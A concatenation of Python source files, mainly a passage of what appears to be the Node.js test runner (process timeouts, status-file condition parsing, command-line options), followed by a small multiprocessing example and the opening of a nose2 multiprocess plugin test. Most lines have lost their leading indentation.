os.kill(pid, signal_to_send)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode)
except ImportError:
pass
return prev_error_mode
def KillTimedOutProcess(context, pid):
signal_to_send = signal.SIGTERM
if context.abort_on_timeout:
# Using SIGABRT here allows the OS to generate a core dump that can be
# looked at post-mortem, which helps for investigating failures that are
# difficult to reproduce.
signal_to_send = signal.SIGABRT
KillProcessWithID(pid, signal_to_send)
def RunProcess(context, timeout, args, **rest):
if context.verbose: print("#", " ".join(args))
popen_args = args
prev_error_mode = SEM_INVALID_VALUE
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX
prev_error_mode = Win32SetErrorMode(error_mode)
Win32SetErrorMode(error_mode | prev_error_mode)
process = subprocess.Popen(
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillTimedOutProcess(context, process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
while True:
try:
os.unlink(name)
except OSError as e:
# On Windows unlink() fails if another process (typically a virus scanner
# or the indexing service) has the file open. Those processes keep a
# file open for a short time only, so yield and try again; it'll succeed.
if sys.platform == 'win32' and e.errno == errno.EACCES:
time.sleep(0)
continue
PrintError("os.unlink() " + str(e))
break
def Execute(args, context, timeout=None, env=None, disable_core_files=False, stdin=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
if env is None:
env = {}
env_copy = os.environ.copy()
# Remove NODE_PATH
if "NODE_PATH" in env_copy:
del env_copy["NODE_PATH"]
# Remove NODE_REPL_EXTERNAL_MODULE
if "NODE_REPL_EXTERNAL_MODULE" in env_copy:
del env_copy["NODE_REPL_EXTERNAL_MODULE"]
# Extend environment
for key, value in env.items():
env_copy[key] = value
preexec_fn = None
if disable_core_files and not utils.IsWindows():
def disableCoreFiles():
import resource
resource.setrlimit(resource.RLIMIT_CORE, (0,0))
preexec_fn = disableCoreFiles
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdin = stdin,
stdout = fd_out,
stderr = fd_err,
env = env_copy,
preexec_fn = preexec_fn
)
os.close(fd_out)
os.close(fd_err)
output = open(outname, encoding='utf8').read()
errors = open(errname, encoding='utf8').read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root, section):
self.context = context
self.root = root
self.section = section
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in range(len(path)):
if not path[i].match(NormalizePath(file[i])):
return False
return True
def GetTestStatus(self, sections, defs):
status_file = join(self.root, '%s.status' % self.section)
if exists(status_file):
ReadConfigurationInto(status_file, sections, defs)
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
module = get_module('testcfg', self.path)
self.config = module.GetConfiguration(context, self.path)
if hasattr(self.config, 'additional_flags'):
self.config.additional_flags += context.node_args
else:
self.config.additional_flags = context.node_args
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, arch, mode):
tests = self.GetConfiguration(context).ListTests(current_path, path,
arch, mode)
result += tests
for i in range(1, context.repeat):
result += copy.deepcopy(tests)
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests_repos, test_root):
super(LiteralTestSuite, self).__init__('root')
self.tests_repos = tests_repos
self.test_root = test_root
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests_repos:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, arch, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests_repos:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, arch, mode)
result.sort(key=lambda x: x.GetName())
return result
def GetTestStatus(self, context, sections, defs):
# Just read the test configuration from root_path/root.status.
root = TestConfiguration(context, self.test_root, 'root')
root.GetTestStatus(sections, defs)
for tests_repos in self.tests_repos:
tests_repos.GetTestStatus(context, sections, defs)
TIMEOUT_SCALEFACTOR = {
'armv6' : { 'debug' : 12, 'release' : 3 }, # The ARM buildbots are slow.
'arm' : { 'debug' : 8, 'release' : 2 },
'ia32' : { 'debug' : 4, 'release' : 1 },
'ppc' : { 'debug' : 4, 'release' : 1 },
's390' : { 'debug' : 4, 'release' : 1 } }
class Context(object):
def __init__(self, workspace, verbose, vm, args, expect_fail,
timeout, processor, suppress_dialogs,
store_unexpected_output, repeat, abort_on_timeout):
self.workspace = workspace
self.verbose = verbose
self.vm = vm
self.node_args = args
self.expect_fail = expect_fail
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
self.repeat = repeat
self.abort_on_timeout = abort_on_timeout
self.v8_enable_inspector = True
self.node_has_crypto = True
def GetVm(self, arch, mode):
if self.vm is not None:
return self.vm
if arch == 'none':
name = 'out/Debug/node' if mode == 'debug' else 'out/Release/node'
else:
name = 'out/%s.%s/node' % (arch, mode)
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
if not exists(name + '.exe'):
name = name.replace('out/', '')
name = os.path.abspath(name + '.exe')
if not exists(name):
raise ValueError('Could not find executable. Should be ' + name)
return name
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[ARCH_GUESS or 'ia32'][mode]
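# Illustrative sketch (the helper below is hypothetical and unused elsewhere):
# GetTimeout() above multiplies the base --timeout value by the factor for the
# guessed architecture and the build mode from TIMEOUT_SCALEFACTOR, falling
# back to 'ia32' when no architecture can be guessed. The helper shows the
# same lookup with an explicit arch argument.
def _example_scaled_timeout(base_timeout=120, arch='arm', mode='debug'):
  # e.g. 120 * 8 == 960 seconds for a debug run on ARM
  factor = TIMEOUT_SCALEFACTOR.get(arch, TIMEOUT_SCALEFACTOR['ia32'])[mode]
  return base_timeout * factor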
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
RUN = 'run'
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
DONTCARE = 'dontcare'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return set([env[self.name]])
else: return set()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return set([self.name])
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs) & self.right.GetOutcomes(env, defs)
return bool(inter)
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs) | self.right.GetOutcomes(env, defs)
elif self.op == 'if':
if self.right.Evaluate(env, defs):
return self.left.GetOutcomes(env, defs)
else:
return set()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs) & self.right.GetOutcomes(env, defs)
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
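# Illustrative sketch (hypothetical helper, not called anywhere): the token
# stream Tokenize() produces for a typical status-file condition. '$' and the
# variable name are emitted as separate tokens; the parser below recombines
# them into Variable nodes.
def _example_tokenize():
  tokens = Tokenizer("$mode==debug && ($system==linux, $system==macos)").Tokenize()
  # tokens == ['$', 'mode', '==', 'debug', '&&', '(', '$', 'system', '==',
  #            'linux', ',', '$', 'system', '==', 'macos', ')']
  return tokens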
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
    left = Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print("Malformed expression: '%s'" % expr)
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print("Malformed expression: '%s'" % expr)
return None
if scan.HasMore():
print("Malformed expression: '%s'" % expr)
return None
return ast
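# Hypothetical usage sketch (not part of the original tool): a condition string
# is parsed into an Expression tree and evaluated against the same kind of env
# dict that Main() builds ('mode', 'system', 'arch', 'type').
def _example_parse_condition():
  ast = ParseCondition("$system==linux && $mode==debug")
  env = {'system': 'linux', 'mode': 'debug'}
  return ast.Evaluate(env, {})  # True, so a section/rule guarded by it applies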
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [ s for s in self.sections if s.condition.Evaluate(env, self.defs) ]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = []
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes_list = [ r.GetOutcomes(env, self.defs) for r in matches ]
outcomes = reduce(set.union, outcomes_list, set())
unused_rules.difference_update(matches)
case.outcomes = set(outcomes) or set([PASS])
# slow tests may also just pass.
if SLOW in case.outcomes:
case.outcomes.add(PASS)
result.append(case)
return result, unused_rules
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
return self.value.GetOutcomes(env, defs)
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in range(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w_.\-/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
raise Exception("Malformed line: '%s'." % line)
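# For orientation, ReadConfigurationInto() accepts status files of roughly this
# shape (an invented sketch, not a real file from the tree):
#
#   prefix parallel
#   [$system==win32]
#   test-console-colors : SKIP
#   [$mode==debug]
#   test-heavy-gc : SLOW, FLAKY
#   def pass_or_timeout = PASS || TIMEOUT
#
# A '[...]' header opens a new Section gated by the parsed condition, a
# 'path : outcomes' line adds a Rule (the path is qualified by the most recent
# 'prefix' line), and a 'def name = ...' line stores a reusable outcome alias
# in 'defs'. Anything else raises the "Malformed line" exception above.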
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
      help='write test output to file. NOTE: this only applies to the tap progress indicator')
result.add_option("-p", "--progress",
help="The style of progress indicator (%s)" % ", ".join(PROGRESS_INDICATORS.keys()),
choices=list(PROGRESS_INDICATORS.keys()), default="mono")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=120, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--special-command", default=None)
result.add_option("--node-args", dest="node_args", help="Args to pass through to Node",
default=[], action="append")
result.add_option("--expect-fail", dest="expect_fail",
help="Expect test cases to fail", default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--worker", help="Run parallel tests inside a worker context",
default=False, action="store_true")
result.add_option("--check-deopts", help="Check tests for permanent deoptimizations",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--skip-tests",
help="Tests that should not be executed (comma-separated)",
default="")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("-J", help="Run tasks in parallel on all cores",
default=False, action="store_true")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to node executable", default=None)
result.add_option("--store-unexpected-output",
      help="Store the temporary JS files from tests that fail",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
      help="Delete the temporary JS files from tests that fail",
dest="store_unexpected_output", action="store_false")
result.add_option("-r", "--run",
help="Divide the tests in m groups (interleaved) and run tests from group n (--run=n,m with n < m)",
default="")
result.add_option('--temp-dir',
help='Optional path to change directory used for tests', default=False)
result.add_option('--test-root',
help='Optional path to change test directory', dest='test_root', default=None)
result.add_option('--repeat',
help='Number of times to repeat given tests',
default=1, type="int")
result.add_option('--abort-on-timeout',
help='Send SIGABRT instead of SIGTERM to kill processes that time out',
default=False, action="store_true", dest="abort_on_timeout")
result.add_option("--type",
help="Type of build (simple, fips, coverage)",
default=None)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.arch = options.arch.split(',')
options.mode = options.mode.split(',')
options.run = options.run.split(',')
# Split at commas and filter out all the empty strings.
options.skip_tests = [test for test in options.skip_tests.split(',') if test]
if options.run == [""]:
options.run = None
elif len(options.run) != 2:
print("The run argument must be two comma-separated integers.")
return False
else:
try:
options.run = [int(level) for level in options.run]
except ValueError:
print("Could not parse the integers from the run argument.")
return False
if options.run[0] < 0 or options.run[1] < 0:
print("The run argument cannot have negative integers.")
return False
if options.run[0] >= options.run[1]:
print("The test group to run (n) must be smaller than number of groups (m).")
return False
if options.J:
    # Inherit JOBS from the environment if provided; some virtualised systems
    # tend to exaggerate the number of available cpus/cores.
cores = os.environ.get('JOBS')
options.j = int(cores) if cores is not None else multiprocessing.cpu_count()
if options.flaky_tests not in [RUN, SKIP, DONTCARE]:
print("Unknown flaky-tests mode %s" % options.flaky_tests)
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(path_arg):
stripped = [c.strip() for c in path_arg.split('/')]
return [Pattern(s) for s in stripped if len(s) > 0]
def NormalizePath(path, prefix='test/'):
# strip the extra path information of the specified test
prefix = prefix.replace('\\', '/')
path = path.replace('\\', '/')
if path.startswith(prefix):
path = path[len(prefix):]
if path.endswith('.js'):
path = path[:-3]
elif path.endswith('.mjs'):
path = path[:-4]
return path
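# Illustrative sketch (hypothetical helper): how a command-line selector such
# as "parallel/test-fs-*" becomes Pattern objects via SplitPath() and is then
# matched against a normalized on-disk test path.
def _example_path_matching():
  patterns = SplitPath("parallel/test-fs-*")   # [Pattern('parallel'), Pattern('test-fs-*')]
  parts = NormalizePath("test/parallel/test-fs-access.js").split('/')
  # parts == ['parallel', 'test-fs-access']
  return all(p.match(part) for p, part in zip(patterns, parts))  # True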
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
prefix, _, suffix = value.partition('@')
prefix = unquote(prefix).split()
suffix = unquote(suffix).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
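# Hypothetical example of the '@' placeholder handling above: the words before
# and after '@' wrap the normal node invocation, which is how --valgrind is
# wired up later in Main().
def _example_special_command():
  expand = GetSpecialCommandProcessor("python -u tools/run-valgrind.py @")
  return expand(["out/Release/node", "test.js"])
  # ['python', '-u', 'tools/run-valgrind.py', 'out/Release/node', 'test.js']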
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def FormatTimedelta(td):
if hasattr(td, 'total_seconds'):
d = td.total_seconds()
else: # python2.6 compat
d = td.seconds + (td.microseconds / 10.0**6)
return FormatTime(d)
def PrintCrashed(code):
if utils.IsWindows():
return "CRASHED"
else:
return "CRASHED (Signal: %d)" % -code
# these suites represent special cases that should not be run as part of the
# default JavaScript test-run, e.g., internet/ requires a network connection,
# addons/ requires compilation.
IGNORED_SUITES = [
'addons',
'benchmark',
'doctool',
'embedding',
'internet',
'js-native-api',
'node-api',
'pummel',
'tick-processor',
'v8-updates'
]
def ArgsToTestPaths(test_root, args, suites):
if len(args) == 0 or 'default' in args:
def_suites = [s for s in suites if s not in IGNORED_SUITES]
args = [a for a in args if a != 'default'] + def_suites
subsystem_regex = re.compile(r'^[a-zA-Z-]*$')
check = lambda arg: subsystem_regex.match(arg) and (arg not in suites)
mapped_args = ["*/test*-%s-*" % arg if check(arg) else arg for arg in args]
paths = [SplitPath(NormalizePath(a)) for a in mapped_args]
return paths
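# Sketch of the mapping above (suite names below are illustrative): a bare
# subsystem name that is not itself a suite is expanded into a glob over every
# suite, while explicit paths pass through NormalizePath()/SplitPath() as given.
def _example_args_to_test_paths():
  suites = ['parallel', 'sequential']          # hypothetical suite list
  args = ['fs', 'parallel/test-stream-pipe']   # 'fs' is a subsystem, not a suite
  # 'fs' becomes the glob '*/test*-fs-*'; the explicit path is kept unchanged.
  return ArgsToTestPaths('test', args, suites)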
def get_env_type(vm, options_type, context):
if options_type is not None:
env_type = options_type
else:
# 'simple' is the default value for 'env_type'.
env_type = 'simple'
ssl_ver = Execute([vm, '-p', 'process.versions.openssl'], context).stdout
if 'fips' in ssl_ver:
env_type = 'fips'
return env_type
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile, encoding='utf-8', mode='w')
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
test_root = join(workspace, 'test')
if options.test_root is not None:
test_root = options.test_root
suites = GetSuites(test_root)
repositories = [TestRepository(join(test_root, name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories, test_root)
paths = ArgsToTestPaths(test_root, args, suites)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
if options.check_deopts:
options.node_args.append("--trace-opt")
options.node_args.append("--trace-file-names")
# --always-opt is needed because many tests do not run long enough for the
# optimizer to kick in, so this flag will force it to run.
options.node_args.append("--always-opt")
options.progress = "deopts"
if options.worker:
run_worker = join(workspace, "tools", "run-worker.js")
options.node_args.append(run_worker)
processor = GetSpecialCommandProcessor(options.special_command)
context = Context(workspace,
VERBOSE,
options.shell,
options.node_args,
options.expect_fail,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output,
options.repeat,
options.abort_on_timeout)
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for arch in options.arch:
for mode in options.mode:
vm = context.GetVm(arch, mode)
if not exists(vm):
print("Can't find shell executable: '%s'" % vm)
continue
archEngineContext = Execute([vm, "-p", "process.arch"], context)
vmArch = archEngineContext.stdout.rstrip()
if archEngineContext.exit_code != 0 or vmArch == "undefined":
print("Can't determine the arch of: '%s'" % vm)
print(archEngineContext.stderr.rstrip())
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': vmArch,
'type': get_env_type(vm, options.type, context),
}
test_list = root.ListTests([], path, context, arch, mode)
unclassified_tests += test_list
cases, unused_rules = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = (
globally_unused_rules.intersection(unused_rules))
all_cases += cases
all_unused.append(unused_rules)
# We want to skip the inspector tests if node was built without the inspector.
has_inspector = Execute([vm,
'-p', 'process.features.inspector'], context)
if has_inspector.stdout.rstrip() == 'false':
context.v8_enable_inspector = False
has_crypto = Execute([vm,
'-p', 'process.versions.openssl'], context)
if has_crypto.stdout.rstrip() == 'undefined':
context.node_has_crypto = False
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print("--- begin source: %s ---" % test.GetLabel())
source = test.GetSource().strip()
print(source)
print("--- end source: %s ---" % test.GetLabel())
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print("Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path]))
tempdir = os.environ.get('NODE_TEST_DIR') or options.temp_dir
if tempdir:
os.environ['NODE_TEST_DIR'] = tempdir
try:
os.makedirs(tempdir)
except OSError as exception:
if exception.errno != errno.EEXIST:
print("Could not create the temporary directory", options.temp_dir)
sys.exit(1)
def should_keep(case):
if any((s in case.file) for s in options.skip_tests):
return False
elif SKIP in case.outcomes:
return False
elif (options.flaky_tests == SKIP) and (set([SLOW, FLAKY]) & case.outcomes):
return False
else:
return True
cases_to_run = [
test_case for test_case in all_cases if should_keep(test_case)
]
if options.report:
print(REPORT_TEMPLATE % {
'total': len(all_cases),
'skipped': len(all_cases) - len(cases_to_run),
'pass': len([t for t in cases_to_run if PASS in t.outcomes]),
'fail_ok': len([t for t in cases_to_run if t.outcomes == set([FAIL, OKAY])]),
'fail': len([t for t in cases_to_run if t.outcomes == set([FAIL])])
})
if options.run is not None:
    # Must ensure the list of tests is sorted before selecting, to avoid
    # silent errors if this file is changed to list the tests in a way that
    # can differ between machines.
cases_to_run.sort(key=lambda c: (c.arch, c.mode, c.file))
cases_to_run = [ cases_to_run[i] for i
in range(options.run[0],
len(cases_to_run),
options.run[1]) ]
if len(cases_to_run) == 0:
print("No tests to run.")
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print("Interrupted")
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print()
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t for t in cases_to_run if not t.duration is None ]
timed_tests.sort(key=lambda x: x.duration)
for i, entry in enumerate(timed_tests[:20], start=1):
t = FormatTimedelta(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (i, t, entry.GetLabel()))
return result
if __name__ == '__main__':
sys.exit(Main())
|
proc_multi.py
|
from multiprocessing import Process
def f(name):
print("hello", name)
p = Process(target=f, args=("Bob",))
p.start()
p.join()
|
test_mp_plugin.py
|
import sys
from nose2 import session
from nose2.plugins.mp import MultiProcess, procserver
from nose2.plugins import buffer
from nose2.plugins.loader import discovery, testcases
from nose2.tests._common import FunctionalTestCase, support_file, Conn
from six.moves import queue
import multiprocessing
import threading
import time
import unittest
from multiprocessing import connection
class TestMpPlugin(FunctionalTestCase):
def setUp(self):
super(TestMpPlugin, self).setUp()
self.session = session.Session()
self.plugin = MultiProcess(session=self.session)
def test_flatten_without_fixtures(self):
sys.path.append(support_file('scenario/slow'))
import test_slow as mod
suite = unittest.TestSuite()
suite.addTest(mod.TestSlow('test_ok'))
suite.addTest(mod.TestSlow('test_fail'))
suite.addTest(mod.TestSlow('test_err'))
